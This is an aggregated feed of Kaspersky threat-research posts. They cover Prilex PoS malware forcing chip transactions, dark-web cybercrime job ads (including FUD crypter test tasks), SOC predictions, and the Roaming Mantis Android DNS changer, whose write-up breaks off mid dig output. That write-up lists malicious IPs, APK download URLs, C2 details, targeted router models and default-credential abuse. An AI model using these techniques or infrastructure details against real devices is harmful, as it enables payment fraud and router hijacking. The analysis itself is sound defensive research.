Kaspersky

Subscribe to Kaspersky hírcsatorna Kaspersky
Frissítve: 2 óra 22 perc
2023. január 31.

Prilex modification now targeting contactless credit card transactions

Prilex is a singular threat actor that has evolved from ATM-focused malware into unique modular PoS malware—actually, the most advanced PoS threat we have seen so far, as described in a previous article. Forget about those old memory scrapers seen in PoS attacks. Prilex goes beyond these, and it has evolved very differently. This is highly advanced malware adopting a unique cryptographic scheme, doing real-time patching in target software, forcing protocol downgrades, manipulating cryptograms, doing GHOST transactions and performing credit card fraud—even on cards protected with the so-called unhackable CHIP and PIN technology. And now, Prilex has gone even further.

A frequent question asked about this threat was whether Prilex was able to capture data coming from NFC-enabled credit cards. During a recent Incident Response for a customer hit by Prilex, we were able to uncover three new Prilex versions capable of blocking contactless payment transactions, which became very popular in the pandemic times.

This blog post covers the NFC-related capabilities of recent Prilex modifications.

Tap-to-pay

Contactless payment systems are composed of credit and debit cards, key fobs, smart cards, or other devices, including smartphones and other mobile devices that use radio-frequency identification (RFID) or near-field communication (NFC, implemented in Samsung Pay, Apple Pay, Google Pay, Fitbit Pay, or any bank mobile application that supports contactless) for making secure payments.

The embedded integrated circuit chip and antenna enable consumers to pay by waving their card, fob, or handheld device over a reader at a point-of-sale terminal. Contactless payments are made in close physical proximity, unlike other types of mobile payments that use broad-area cellular or WiFi networks and do not require close physical proximity.

Different ways of tap-to-pay, but only one technology: NFC

Here is how they work:

  • To make a payment with a contactless credit card, the cardholder simply holds the card close to the contactless-enabled payment terminal (usually within a few inches).
  • The terminal sends a radio frequency (RF) signal to the card, activating the RFID chip embedded in the card.
  • The RFID chip in the card sends a unique identification number (ID) and transaction information to the terminal. The transaction data is non-reusable, so even if it is stolen by cybercriminals, they cannot steal the money by using that. Neither can they access the RFID chip to tamper with the data generation processes.
  • The terminal sends the transaction information to the card issuer’s processing network for authorization.
  • If the transaction is approved, the terminal sends a confirmation message to the cardholder, and the payment is processed.
The pandemic gave a boost to NFC payments

The size of the global market for contactless payments was estimated at $34.55 billion in 2021 and is expected to continue growing at a compound rate of 19.1% from 2022 to 2030 annually, according to GrandView Research. The market was dominated by the retail segment, which accounted for more than 59.0% of global contactless revenue in 2021. Recent years saw an increase in the number of retail tap-and-go transactions: retailers can clearly see the benefits of contactless payments, which reduce transaction time, increase revenue, and improve operational efficiency. As stated in a Mastercard global study covering the year 2020, 74.0% of retailers expressed the intention to continue using contactless payments beyond the pandemic.

According to the US Payments Forum, Visa reports that in the U.S., tap-to-pay accounts for 28% of all face-to-face transactions, five times the pre-pandemic levels, while Mastercard says that 82% of card-present transactions in the country are happening at contactless-enabled locations. In Australia, contactless payments were growing in popularity even before the pandemic, with four out of five point-of-sale purchases being contactless in 2019. In the coming years, the popularity of this payment method is expected to grow even more everywhere in the world.

Contactless credit cards offer a convenient and secure way to make payments without the need to physically insert or swipe the card. But what happens if a threat can disable these payments in the PoS terminal and force you to insert the card?

Insert-to-get-robbed

We have observed three new Prilex versions in the wild and managed to obtain the latest one (version 06.03.8080). The two others are 06.03.8070 and 06.03.8072.

The obtained version was discovered as recently as November 2022 and appears to originate from a different codebase than the others we found at the beginning of that year. Prilex now implements a rule-based file that specifies whether or not to capture credit card information and an option to block NFC-based transactions.

Excerpt from a Prilex rules file referencing NFC blocking

This is due to the fact that NFC-based transactions often generate a unique ID or card number valid for only one transaction. If Prilex detects an NFC-based transaction and blocks it, the PIN pad will show the following message:

Prilex fake error displayed on the PIN pad reader that says, “Contactless error, insert your card”

Of course, the goal here is to force the victim to use their physical card by inserting it into the PIN pad reader, so the malware will be able to capture the data coming from the transaction by using all the techniques described in our previous publication, such as manipulating cryptograms and performing a GHOST attack. Another interesting new feature added in the latest Prilex samples is the possibility to filter credit cards according to segment and create different rules for each segment. For example, these rules can block NFC and capture card data only if the card is a Black/Infinite, Corporate or another tier with a high transaction limit, which is much more attractive than standard credit cards with a low balance/limit.

Malware adapting to the latest trends

With contactless cards growing in numbers and adoption increasing all over the world, the number of payments using this method has increased significantly and is expected to grow further in the years to come. Since transaction data generated during a contactless payment are useless from a cybercriminal’s perspective, it is understandable that Prilex needs to force victims to insert the card into the infected PoS terminal. While the group is looking for a way to commit fraud with unique credit card numbers, this clever trick allows it to continue operating.

The Prilex family is detected by all Kaspersky products as HEUR:Trojan.Win32.Prilex and HEUR:Trojan.Win64.Prilex. More detailed analysis on the latest Prilex versions and a full analysis are available to customers of our private Threat Intelligence Reports. For any requests on this topic, please contact crimewareintel@kaspersky.com.

2023. január 30.

Come to the dark side: hunting IT professionals on the dark web

The dark web is a collective name for a variety of websites and marketplaces that bring together individuals willing to engage in illicit or shady activities. Dark web forums contain ads for selling and buying stolen data, offers to code malware and hack websites, posts seeking like-minded individuals to participate in attacks on companies, and many more.

Just as any other business, cybercrime needs labor. New team members to participate in cyberattacks and other illegal activities are recruited right where the business is done – on the dark web. We reviewed job ads and resumes that were posted on 155 dark web forums from January 2020 through June 2022 and analyzed those containing information about a long-term engagement or a full-time job.

This post covers the peculiarities of this kind of employment, terms, candidate selection criteria, and compensation levels. Further information, along with an analysis of the most popular IT jobs on the dark web, can be found in the full version of the report.

Key outcomes

Our analysis of the dark web job market found:

  • The greatest number of ads were posted in March 2020, which was likely related to the outbreak of the COVID-19 pandemic and the ensuing changes in the structure of the job market.
  • The major dark web employers are hacker teams and APT groups looking for those capable of developing and spreading malware code, building and maintaining IT infrastructure, and so on.
  • Job ads seeking developers are the most frequent ones, at 61% of the total.
  • Developers also topped the list of the best-paid dark web IT jobs: the highest advertised monthly salary figure we saw in an ad for a developer was $20,000.
  • The median levels of pay offered to IT professionals varied between $1,300 and $4,000.
  • The highest median salary of $4,000 could be found in ads for reverse engineers.
The dark web job market

Most dark web employers offer semi-legal and illegal jobs, but there are ads with potentially legal job offers that comply with national laws. An example is creating IT learning courses.

Sketchy employment arrangements can border on the illegal and sometimes go against the law. An example of a dubious job is selling questionable drugs for profit on fraudulent websites.

Dirty jobs are illegal and often present a criminal offense. An individual engaged in these can be prosecuted and jailed if caught. Fraudulent schemes or hacking websites, social network accounts and corporate IT infrastructure all qualify as dirty jobs.

Offers like that come from hacker groups, among others. Cybercrooks need a staff of professionals with specific skills to penetrate the infrastructure of an organization, steal confidential data, or encrypt the system for subsequent extortion.

Attack team coordination diagram

People may have several reasons for going to a dark web site to look for a job. Many are drawn by expectations of easy money and large financial gain. Most times, this is only an illusion. Salaries offered on the dark web are seldom significantly higher than those you can earn legally. Moreover, the level of compensation depends on your experience, talent, and willingness to invest your energy into work. Nevertheless, unhappy with their pay, a substantial percentage of employees in the legitimate economy quit their jobs to find similar employment on the dark web market. Changes on the market, layoffs, and pay cuts, too, often prompt them to look for a job on cybercrime websites.

Other factors are a lack of certain candidate requirements, such as a higher education, military service record, absence of prior convictions, and so on. Legal age is the main requirements that many ads have in common. Dark web jobs look attractive to freelancers and remote workers because there is no office they have to show up in, and they can remain digital nomads. Candidates are attracted by a large degree of freedom offered on the dark web: you can take as many days off as you want, there is no dress code, and you are free to choose any schedule, tasks and scope of work.

Another reason why people look for a job on the dark web is poor awareness of possible consequences or a flippant attitude to those. Working with underground teams, let alone cybercrime groups, poses serious risks: members can be deanonymized and prosecuted, and even getting paid is not a guarantee.

Example of a resume posting

Dark web job market statistics

To analyze the state of the dark web job market in January 2020 through June 2022, we gathered statistics on messages that mentioned employment, posted on 155 dark web forums. Messages were selected from forum sections on any jobs, not necessarily those in IT.

A total of roughly 200,000 employment-related ads were posted on the dark web forums during the period in question. The largest number of these, or 41% of the total, were posted in 2020. Posting activity peaked in March 2020, possibly caused by a pandemic-related income drop experienced by part of the population.

Ad posting statistics by quarter, Q1 2020–Q2 2022 (download)

The impact of the pandemic was especially noticeable on the CIS markets.

The resume of a candidate who has found himself in a pinch (1)

See translation

Guy over 25, no addictions, into sports. Quarantined without cash, looking for rewarding job offers, ready to cooperate.

The resume of a candidate who has found himself in a pinch (2)

Some of the living in the region suffered from reduction of income, took a mandatory furlough, or lost their jobs altogether, which subsequently resulted in rising unemployment levels (article in Russian).

Tags on an ad offering a job amid the crisis

See translation

how to earn money amid crisis
make some cash during pandemic
make money during coronavirus
coronavirus updates
pandemic jobs
jobs amid crisis

Some jobseekers lost all hope to find steady, legitimate employment and began to search on dark web forums, spawning a surge of resumes there. As a result, we observed the highest ad numbers, both from prospective employers and jobseekers, or 6% of the total, in March 2020.

Posting dynamics on dark web job forums in 2020–2022 (download)

Ads seeking jobs were significantly fewer than those offering, with just 17% of all ads we found related to employment. The statistics suggest that jobseekers respond to job ads by prospective employers more frequently than they post resumes.

Resumes posted on dark web forums target diverse areas of expertise and job descriptions: from moderating Telegram channels to compromising corporate infrastructure. This study focused on IT jobs specifically. We analyzed 867 ads that contained specified keywords, 638 of the ads being vacancy postings and 229 being resumes.

The most in-demand professionals on the dark web were developers: this specialization accounted for 61% of total ads. Attackers (pentesters) were second, with 16%, and designers came third, with 10%.

Distribution of dark web job ads across specializations (download)

Selection criteria

The methods of selecting IT professionals on the dark web market are much the same as those used by legitimate businesses. Employers similarly look for highly skilled workforce, so they seek to select the best candidates.

Selection criteria in dark web job postings. The percentages presented were calculated out of the total number of ads that clearly stated selection criteria (download)

Job postings often mention test assignments, including paid ones, as well as interviews, probation periods, and other selection methods.

Job posting that offers applicants a test assignment

See translation

PM us your resume if you’re interested. We’ll send the suitable candidates a paid test assignment (20,000 rub in BTC at current rate).

One job ad even contained a detailed description of the employee selection process. An applicant had to undergo several rounds of screening, test assignments involving encryption of malware executables and evasion of protective measures, and a probation period.

Example of a candidate selection flow

See translation

Candidate selection procedure:

  1. We give you a test DLL to encrypt. Must be a FUD scantime encrypt with max 3 minor AV runtime detects.
  2. If step 1 completed successfully, you get a live file to encrypt. Must be a FUD scantime encrypt, stay clean for 24 hours (no d/l)
  3. If step 2 completed successfully, we put you on a trial period of two weeks for $40/encrypt. We expect a functional FUD DLL/EXE by 1 PM Moscow time every Monday through Friday.
  4. If trial completed successfully, you were regularly online, doing cleanups, and you showed yourself to be a painstaking and competent professional, we hire you full-time for $800–$1500/week.

The absence of addictions, such as drugs and alcohol, is one of the requirements peculiar to the recruitment process on the dark web.

Job posting saying that only those free from addictions can be selected

See translation

Teamwork skills, stable connection, no alcohol or drug addictions Employment terms

Employers on the dark web seek to attract applicants by offering favorable terms of employment, among other things. The most frequently mentioned advantages included remote work (45%), full-time employment (34%), and flextime (33%). That being said, remote work is a necessity rather than an attractive offer on the dark web, as anonymity is key in the world of cybercrime. You can also come across paid time off, paid sick leaves, and even a friendly team listed among the terms of employment.

Employment terms in dark web job postings. The percentages presented were calculated out of the total number of ads that clearly stated the terms of employment (download)

Cybercrime groups, who look for the most highly skilled professionals, offer the best terms, including prospects of promotion and incentive plans.

Employment terms in a dark web job posting

See translation

Terms:

  • Paychecks on time. Pay rate ($2000 and up) to be fixed after successful test assignment and interview
  • Fully REMOTE, 5 days/week, Sat and Sun off.
  • PTO
  • NO formal employment contract
  • We offer a continuous increase in pay: with each successful assignment, you get a raise and an instant bonus.

These groups may conduct performance reviews as did Conti. The reviews may result in the employee receiving a bonus or being fined due to unproductivity. On top of that, some underground organizations run employee referral programs offering bonuses to those who have successfully engaged new workers.

Similarly to the legitimate job market, dark web employers offer various work arrangements: full time, part time, traineeships, business relationships, partnerships, or team membership.

Job posting that suggests cooperation

The absence of a legally executed employment contract is the key differentiator between the dark web and the legitimate job market. This is not to say that you never come across perfectly legal job ads on the dark web. For instance, we discovered several ads seeking a developer for a well-known Russian bank and mentioning a legally executed contract and voluntary health insurance.

Legitimate job ad found on the dark web

See translation
  • Work for a top 50 Russian bank.
  • Formal employment contract
  • VHI starting from first month of employment
  • Work schedule: 5/2, remote work
  • Compensation levels: remote developer in Samara: ₽125,000 gross + 10% annual bonus; onsite developer in Penza: ₽115,000 gross + 10% annual bonus
  • Professional team, friendly environment
  • Challenging task and projects, chance to make a difference
Levels of compensation

We analyzed more than 160 IT job ads that explicitly stated a salary[1]. When reviewing the statistics, it is worth bearing in mind that dark web employers typically state rough salary figures. Many employers provide a pay range or a lower limit.

Job posting that indicates a ballpark level of compensation

Your level of compensation may grow with time depending on how much effort you invest, your contribution, and how successful the business is on the whole. Compensation is typically indicated in dollars, but in practice work is often paid for in cryptocurrency.

The diagram below shows the minimum and maximum levels of compensation for selected IT jobs.

IT pay ranges from dark web job ads (download)

The most highly paid job at the time of the study was coding, commanding a maximum of $20,000 per month. However, the lower limit there was the smallest: just $200.

Example of offer with the highest salary for developers

The median monthly salary of a reverse engineer was also notably high at $4,000.

Job Median monthly salary Attacker $2,500 Developer $2,000 Reverse engineer $4,000 Analyst $1,750 IT administrator $1,500 Tester $1,500 Designer $1,300

Median monthly IT salaries on the dark web

Some dark web job ads promised levels of compensation much higher that the figures quoted above, but it included bonuses and commissions from successful projects, such as extorting a ransom from a compromised organization.

Not every job posting made the compensation statistics, as some looked suspicious or openly fraudulent.

Thus, a job ad on the dark web promised up to $100,000 per month to a successful pentesting candidate. Interestingly enough, the work was described as “legal.”

Job posting on a dark web forum offering an inflated compensation figure

See translation

search, employee / Seeking website pentesters ХХЕ, XSS, SQL
Looking for a person who knows ХХЕ, XSS, SQL attacks inside and out to pentest our sites for vulnerabilities.
Fully legal
Compensation up to $100,000/mo.
PM for details

Besides the usual hourly, daily, weekly, and monthly rates, there are other forms of compensation that serve as the base pay or complement it. You could come across job ads that offered wages to be paid for completing a job: hacking a website or creating a phishing web page.

Various performance-dependent commission was often promised in addition to the salary. For example, a pentester could be promised a monthly salary of $10,000 along with a percentage of the profits received from selling access to a compromised organization’s infrastructure or confidential data, extortion, and other ways of monetizing the hack.

Example of a job ad that offered a salary and a performance bonus

See translation

Seeking WIN pentester to join our team.

  1. Experience with Cobalt Strike, MSF, etc. required
  2. Commitment to work is a must
  3. No addictions

Compensation up to $10,000/mo. + bonus.
PM if interested.

Candidates were often offered commission only. In several cases, no compensation of any kind was provided. Applicants were offered to work pro bono, for promised commission, or for a share of the profits in the future.

Example of an unpaid job ad

Takeaways

The dark web is a versatile platform that cybercriminals not only use for striking deals and spreading illegal information, but also for hiring members to their teams and groups.

The data provided in this report shows that demand for IT professionals is fairly high on cybercrime websites, with new team members often being salaried employees. It is interesting, too, that cybercrime communities use the same methods for recruiting new members as legitimate organizations, and job ads they post often resemble those published on regular recruitment sites.

The ads we analyzed also suggest that a substantial number of people are willing to engage in illicit or semilegal activities despite the accompanying risks. In particular, many turn to the shadow market for extra income in a crisis. Thus, the number of resumes on dark web sites surged as the pandemic broke out in March 2020. Although dark web jobs could be expected to pay higher than legitimate ones, we did not detect a significant difference between the median levels of IT professionals’ compensation in the cybercriminal ecosystem and the legitimate job market.

Software development proved to be the most sought-after skill, with 61% of all ads seeking developers. This could suggest that the complexity of cyberattacks is growing. The higher demand for developers could be explained by a need to create and configure new, more complex tools.

It is worth noting that the risks associated with working for a dark web employer still outweigh the benefits. The absence of a legally executed employment contract relieves employers of any responsibility. A worker could be left unpaid, framed or involved in a fraudulent scheme.

It is not worth forgetting the risks of being prosecuted, put on trial and imprisoned for the unlawful activities. The risks of cooperating with hacker groups are especially high, as deanonymization of their members is a priority for cybercrime investigation teams. The group may be exposed sooner or later, and its members, face jail time.

To inquire about threat monitoring services for your organization, please contact us at dfi@kaspersky.com.

[1] Salary levels expressed in Russian rubles were converted using the effective rate at the time of the study: 75 rubles per dollar.

2023. január 23.

What your SOC will be facing in 2023

As the role of cybersecurity in large businesses increases remarkably year over year, the importance of Security Operations Centers (SOCs) is becoming paramount. This year’s Kaspersky Security Bulletin ends with tailored predictions for SOCs – from external and internal points of view. The first part of this report is devoted to the most current threats any SOC is likely to face in 2023. Based on our extensive Managed Detection and Response (MDR) experience and the dynamics we have seen over the years, we provide insights into the trends set to shape the threat landscape for enterprises this year. The second part is devoted to SOC trends from an internal point of view. Here we analyze challenges that managers will face regarding personnel, budgets and functions. They are closely intertwined with the threats looming over corporations in 2023, as only an effectively organized team can safeguard business against rapidly evolving malware and attack methods.

Part 1. What threats security operations centers will face in 2023 Ransomware will increasingly destroy data instead of encrypting it

Cyberspace reflects the global agenda, and geopolitical turbulence influences the attack surface. That’s why in 2023 we can expect the echoes of cyberwarfare to continue reverberating. The most common attack scenarios here are: attacks on employees (social engineering), attacks on IT infrastructure (DDoS), as well as attacks on critical infrastructure. Another interesting trend that started in 2022 and will continue in 2023 is that ransomware now not only encrypts companies’ data, but destroys it in certain cases. This threat looms large over organizations that are subject to politically motivated attacks, which look destined to be on the rise in the coming year.

Public-facing applications will continue to be exploited for initial access

Largely due to some notorious critical vulnerabilities in Exchange, in 2021 and 2022 we observed significant growth in successful initial compromise through the network perimeter, with the share of this type of initial access doubling in 2022 against 2021. Penetration from the perimeter requires less preparation than phishing, and rather old vulnerabilities are still exposed; we expect this tendency to continue in 2023.

Share of exploits in public applications, dynamics in 2021–2022, worldwide statistics (download)

More supply chain attacks via telecom

From year to year here at Kasperksy SOC we observe the interest of attackers for IT and telecom companies. According to the Kaspersky MDR report, in 2021 the telecom industry for the first time saw a prevalence of high severity incidents over medium and low in terms of expected number: on average 79 incidents per 10k systems monitored versus 42 incidents of medium severity and 28 of low severity (see this report for more details). In 2022 we continued to observe cybercriminal interest in telecom companies, although the share of high severity incidents was lower (roughly 12 per 10k computers versus 60 of medium and 22 of low severity). We encountered scenarios in which intruders attacked telecom companies in order to further target their customers. In 2023 we expect an increase in the number of supply chain attacks via telecom providers, which usually offer additional managed services.

Number of incidents in telecom companies per 10K systems in 2021 and 2022, worldwide statistics (download)

More reoccurring targeted attacks by state-sponsored actors

Kaspersky has provided MDR since 2016. During this time, we have observed targeted attacks (TA) across various industries – from automotive to government. Many of them are threatened by targeted attacks, especially large businesses and non-profits. Note that in cases with no signs of live targeted attacks, we still were able to find artefacts from previous targeted attacks.

It means there is a looming threat of reoccurring attacks in 2023: if a company was compromised once, with the attack successfully remediated, attackers are highly likely to try hacking this organization again. After an unsuccessful attack this organization is most likely to be attacked again, as it is a long-term goal of threat actors. This is especially noticeable in government organizations, which tend to get attacked by state-sponsored actors.

Number of incidents in government organizations per 10K systems in 2021 and 2022, worldwide statistics (download)

International conflicts are traditionally accompanied by information warfare where mass media inevitably play an important role. In recent years we have observed steady growth in attacks on this sector, and statistics for 2022 support this trend, with mass media one of the prime targets for attackers, along with government organizations.

Number of incidents in mass media companies per 10K systems in 2021 and 2022, worldwide statistics (download)

In 2023, these two sectors will most likely remain among the most frequently attacked, with the share of high severity incidents probably increasing.

To effectively guard against targeted attacks, it is necessary to implement active threat hunting in combination with MDR.

Part 2. What challenges will SOCs face internally: processes and efficiency SOCs will be forced to raise requirements, while experiencing staff shortages

Looking at the internal challenges, we first need to consider human resources issues. The future of SOC development lies in intensive, not extensive, growth, meaning the value every team member (even unskilled ones) brings to SOC is increasing. Developing the skills of the SOC team is a proven way to counter the increasing amount of threats every SOC will be facing in 2023. That means incident response training, and all forms of SOC exercises, such as TTX, purple teaming, and adversary attack simulations, should be a significant part of 2023 SOC strategy. This gives SOC a goal: to enhance the SOC team, architecture, and operations for better performance. In the case of a mature SOC, it is just a question of time; in others, usually lack of experience and vision in terms of SOC development can be an issue. Commonly, the second case can be solved with a SOC review by external experts, who can identify gaps with fresh eyes to avoid the bias that prevents the internal team from seeing the bigger picture from the outside.

Another trend is related to the lack of skilled and experienced personnel that will continue to be present in 2023: the need for well-defined SOC processes. Therefore we predict an increasing role for SOC process development and related services.

Bigger budgets alongside efficiency as the cornerstone of SOC processes

The growing threat landscape is pushing cybersecurity and SOC budgets skywards. This trend will focus attention on budget spending, prompting “Why? What was the effect? What value does it bring?”- type questions for SOC managers.

With a mature approach, this circumstance should lead SOCs to implement “SOC efficiency management.” As part of this practice, companies will evaluate breach costs and map them to SOC performance in reducing such losses. Combined with analysis of prevented incidents, this can allow SOCs to evaluate the value they bring in monetary terms. But prior to implementing this approach, SOCs will need to deploy efficient metrics and their analysis, as well as established SOC governance processes.

Building full-scale threat intelligence and threat hunting

The growth of cyberattacks and threats will transform into high demand to predict attacks and attacker techniques, thus increasing the value of cyberthreat intelligence (CTI). From what we have observed so far in our daily practice, many SOCs’ CTI activities boil down to managing IOC feeds. This approach is ineffective against zero-day and APT attacks. Current trends already have shifted to establish full-scale CTI capabilities within companies, and in most SOCs have a dedicated CTI unit. That trend will grow and mature in 2023.

Cases of successful attacks being left unwatched for a long time are still common – and will be in 2023 due to the continuous growth of targeted attacks. And the Assume Breach Paradigm will stay with us in 2023 as well, which means that threat hunting has a good chance of becoming a trend.

So, we believe that threat hunting will form a vital part of any SOC development strategy. Although current thinking places it at the bottom of the list of must-have SOC technologies, in most cases this can be explained by poor understanding of how to conduct threat hunting or chaotic approach to delivery. But since threat hunting is part of SOC detection capabilities, which will be challenged by evolving threats, more companies will consider conducting threat hunting on a regular basis with clear goals and an understanding of how to reach them continuously.

These are our predictions for SOC specialists for 2023. Watch this space in 12 months’ time to see which of them came true.

2023. január 19.

Roaming Mantis implements new DNS changer in its malicious mobile app in 2022

Roaming Mantis (a.k.a Shaoye) is well-known as a long-term cyberattack campaign that uses malicious Android package (APK) files to control infected Android devices and steal device information; it also uses phishing pages to steal user credentials, with a strong financial motivation.

Kaspersky has been investigating the actor’s activity throughout 2022, and we observed a DNS changer function used for getting into Wi-Fi routers and undertaking DNS hijacking. This was newly implemented in the known Android malware Wroba.o/Agent.eq (a.k.a Moqhao, XLoader), which was the main malware used in this campaign.

DNS changer via malicious mobile app

Back in 2018, Kaspersky first saw Roaming Mantis activities targeting the Asian region, including Japan, South Korea and Taiwan. At that time, the criminals compromised Wi-Fi routers for use in DNS hijacking, which is a very effective technique. It was identified as a serious issue in both Japan and South Korea. Through rogue DNS servers, all users accessing a compromised router were redirected to a malicious landing page. From mid-2019 until 2022, the criminals mainly used smishing instead of DNS hijacking to deliver a malicious URL as their landing page. The landing page identified the user’s device platform to provide malicious APK files for Android or redirect to phishing pages for iOS.

Infection flow with DNS hijacking

In September 2022, we carried out a deep analysis of Wroba.o (MD5 f9e43cc73f040438243183e1faf46581) and discovered the DNS changer was implemented to target specific Wi-Fi routers. It obtains the default gateway IP address as the connected Wi-Fi router IP, and checks the device model from the router’s admin web interface.

Code for checking Wi-Fi router model

The following strings are hardcoded for checking the Wi-Fi router model:

  • ipTIME N3-i
  • ipTIME N604plus-i
  • EFM Networks ipTIME N604plus-i
  • EFM Networks – ipTIME Q104
  • EFM Networks ipTIME Q104
  • EFM Networks – ipTIME Q204
  • EFM Networks ipTIME Q204
  • EFM Networks ipTIME V108
  • EFM Networks ipTIME Q604
  • EFM Networks ipTIME Q604 PINKMOD
  • EFM Networks ipTIME N104R
  • EFM Networks ipTIME N604R
  • EFM Networks ipTIME Q504
  • EFM Networks ipTIME N5
  • EFM Networks ipTIME N604V
  • EFM Networks ipTIME N104T
  • EFM Networks – ipTIME G301
  • title.n704bcm
  • title.a8004t
  • title.a2004sr
  • title.n804r
  • title.n104e
  • title.n104pk
  • title.a1004ns
  • title.a604m
  • title.n104pi
  • title.a2008
  • title.ax2004b
  • title.n104q
  • title.n604e
  • title.n704e
  • title.n704v3
  • title.n704v5
  • title.t5004
  • title.t5008
  • title.a1004
  • title.a2003nm
  • title.a2004sr
  • title.a5004nm
  • title.a604sky
  • title.n2pi
  • title.n604pi
  • title.a2004m
  • title.a3004nm
  • title.a7ns
  • title.a8txr
  • title.ew302nr
  • title.n602e
  • title.t16000
  • title.a3003ns
  • title.a6004nm
  • title.n1e
  • title.n3i
  • title.n6
  • title.a2004ns
  • title.n1pi
  • title.a2004r
  • title.n704bcm
  • title.n600
  • title.n102e
  • title.n702r
  • title.a8004i
  • title.a2004nm
  • title.t16000m
  • title.a8004t
  • title.a604r
  • title.a9004x2
  • title.a3004t
  • title.n804r
  • title.n5i
  • title.n704qc
  • title.a8004nm
  • title.a8004nb
  • title.n604p
  • title.a604gm
  • title.a3004
  • title.a3008
  • title.n2v
  • title.ax2004m
  • title.v504
  • title.n1p
  • title.n704bcm
  • title.ew302
  • title.n104qi
  • title.n104r
  • title.n2p
  • title.n608
  • title.q604
  • title.n104rsk
  • title.n2e
  • title.n604s
  • title.n604t
  • title.n702bcm
  • title.n804
  • title.n3
  • title.q504
  • title.a604
  • title.v308
  • title.a3004d
  • title.n104p
  • title.g104i
  • title.n604r
  • title.a2004
  • title.a704nb
  • title.a604v
  • title.n6004r
  • title.n604p
  • title.t3004
  • title.n5
  • title.n904
  • title.a5004ns
  • title.n8004r
  • title.n604vlg

From these hardcoded strings, we saw that the DNS changer functionality was implemented to target Wi-Fi routers located in South Korea: the targeted models have been used mainly in South Korea.

Next, the DNS changer connects to the hardcoded vk.com account “id728588947” to get the next destination, which is “107.148.162[.]237:26333/sever.ini”. The “sever.ini” (note the misspelling of server) dynamically provided the criminal’s current rogue DNS IP addresses.

Rogue DNS from a vk.com hardcoded account to compromise the DNS setting

Checking the code of the DNS changer, it seems to be using a default admin ID and password such as “admin:admin”. Finally, the DNS changer generates a URL query with the rogue DNS IPs to compromise the DNS settings of the Wi-Fi router, depending on the model, as follows.

Hardcoded default ID and password to compromise DNS settings using the URL query

We believe that the discovery of this new DNS changer implementation is very important in terms of security. The attacker can use it to manage all communications from devices using a compromised Wi-Fi router with the rogue DNS settings. For instance, the attacker can redirect to malicious hosts and interfere with security product updates. In 2016, details of another Android DNS changer were published, demonstrating why DNS hijacking is critical.

Users connect infected Android devices to free/public Wi-Fi in such places as cafes, bars, libraries, hotels, shopping malls and airports. When connected to a targeted Wi-Fi model with vulnerable settings, the Android malware will compromise the router and affect other devices as well. As a result, it is capable of spreading widely in the targeted regions.

Investigation of landing page statistics

As we mentioned above, the main target regions of the DNS changer were mainly South Korea. However, the attackers not only targeted South Korea but also France, Japan, Germany, the United States, Taiwan, Turkey and other regions. Smishing has been observed to be the main initial infection method in these regions, except South Korea, though we should keep in mind that the criminals may update the DNS changer function to target Wi-Fi routers in those regions in the near future.

In December 2022, we confirmed some landing pages and got an understanding of the number of downloaded APK files. Below are some examples of the download URLs from the landing page statistics.

Target regions Landing page IP # of Downloaded APK Examples of download URLs Japan 103.80.134[.]40
103.80.134[.]41
103.80.134[.]42
103.80.134[.]48
103.80.134[.]49
103.80.134[.]50
103.80.134[.]51
103.80.134[.]52
103.80.134[.]53
103.80.134[.]54 24645 http://3.wubmh[.]com/chrome.apk
http://5.hmrgt[.]com/chrome.apk
http://9v.tbeew[.]com/chrome.apk Austria 199.167.138[.]36
199.167.138[.]38
199.167.138[.]39
199.167.138[.]40 7354 http://8.ondqp[.]com/chrome.apk
http://5c2d.zgngu[.]com/chrome.apk
http://d.vbmtu[.]com/chrome.apk France 199.167.138[.]48
199.167.138[.]49
199.167.138[.]51
199.167.138[.]52 7246 http://j.vbrui[.]com/chrome.apk
http://vj.nrgsd[.]com/chrome.apk
http://k.uvqyo[.]com/chrome.apk Germany 91.204.227[.]144
91.204.227[.]145
91.204.227[.]146 5827 https://mh.mgtnv[.]com/chrome.apk
http://g.dguit[.]com/chrome.apk
http://xtc9.rvnbg[.]com/chrome.apk South Korea 27.124.36[.]32
27.124.36[.]34
27.124.36[.]52
27.124.39[.]241
27.124.39[.]242
27.124.39[.]243 508 http://m.naver.com/chrome.apk
https://m.daum.net/chrome.apk
(legitimate domains because DNS hijacking) Turkey 91.204.227[.]131
91.204.227[.]132 381 http://y.vpyhc[.]com/chrome.apk
http://r48.bgxbm[.]com/chrome.apk
http://t9o.qcupn[.]com/chrome.apk Malaysia 134.122.137[.]14
134.122.137[.]15
134.122.137[.]16 154 http://3y.tmztp[.]com/chrome.apk
http://1hy5.cwdqh[.]com/chrome.apk
http://53th.xgunq[.]com/chrome.apk India 199.167.138[.]41
199.167.138[.]43
199.167.138[.]44
199.167.138[.]45 28 http://w3.puvmw[.]com/chrome.apk
http://o.wgvpd[.]com/chrome.apk
http://kwdd.cehsg[.]com/chrome.apk

The number of downloaded APK files was reset at the beginning of December 2022. After a few days, we got the above numbers from the landing pages, and it showed us that Android malware was still being actively downloaded for some targeted regions. It also showed us that the most affected region was Japan, followed by Austria and France. From this investigation, we noted that the criminals have now also added Austria and Malaysia to their main target regions.

According to the download URLs for each region above, with the exception of South Korea, it seems that the criminals randomly generated and registered these domains to resolve the IP addresses of the landing page. It seems pretty obvious these domains were used as a link in the smishing for the initial infection. Regarding South Korea, the URLs have a legitimate domain because of DNS hijacking. Resolving the legitimate domain for “m.xxx.zzz” (for mobile) and “www.xxx.zzz” with rogue DNS and legitimate DNS yields the following results, respectively:

“m.xxx.zzz” + rogue DNS “www.xxx.zzz” + rogue DNS $ dig m.daum.net @ 193.239.154.15

; <<>> DiG 9.18.1-1ubuntu1.2-Ubuntu <<>>
m.daum.net @193.239.154.15
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status:
NOERROR, id: 15464
;; flags: qr rd; QUERY: 1, ANSWER: 1, AUTHORITY:
0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;;QUESTION SECTION:
;m.daum.net.                    IN      A

;; ANSWER SECTION:
m.daum.net.             600     IN      A       27.124.39.243

;;Query time: 104 msec
;; SERVER: 193.239.154.15#53(193.239.154.15) (UDP)
;; WHEN: Wed Dec 07 02:09:51 GMT 2022
;; MSG SIZE  rcvd: 54 $ dig www.daum.net @193.239.154.15

; <<>> DiG 9.18.1-1ubuntu1.2-Ubuntu <<>>
www.daum.net @193.239.154.15
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status:
NOERROR, id: 40935
;; flags: qr rd; QUERY: 1, ANSWER: 1, AUTHORITY:
0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;www.daum.net.                  IN      A

;; ANSWER SECTION:
